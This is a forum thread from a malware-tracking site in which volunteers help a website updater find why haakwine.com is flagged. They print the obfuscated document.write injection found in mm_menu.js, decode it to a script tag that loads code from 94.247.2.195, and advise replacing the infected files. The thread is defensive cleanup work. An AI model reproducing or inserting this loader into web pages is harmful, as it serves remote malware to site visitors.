Malware Related > Compromised Servers

haakwine.com compromised

(1/2) > >>

gabbafam:
Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time i access one website www.haakwine.com.  I did a yahoo search on the 94.247.2.195 and found this malware domain list and forum.  I don't know if you are the right person to post a reply to but I am really wanting to find out how to clean this off this website because i am the website updater and don't know why it is doing this.  Can you offer any help whatsoever?  I would be greatly indebted to you.

--- Quote from: MysteryFCM on April 07, 2009, 06:17:04 am ---I think you could be right :( ..... the following is the uncompressed output from the PDF;

--- End quote ---

/edit

MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum

MysteryFCM:
I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?

/edit

Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);


--- Code: ---document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
--- End code ---

This decodes to;


--- Code: ---<script src=//94.247.2.195/jquery.js></script>
--- End code ---

GmG:
There's malware script on mm_menu.js


--- Code: ---<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->

--- End code ---

MysteryFCM:
heh yep, updated my post whilst you were posting ....

MysteryFCM:
Script is also present in;

http://www.haakwine.com/Scripts/AC_RunActiveContent.js

Navigation

[0] Message Index

[#] Next page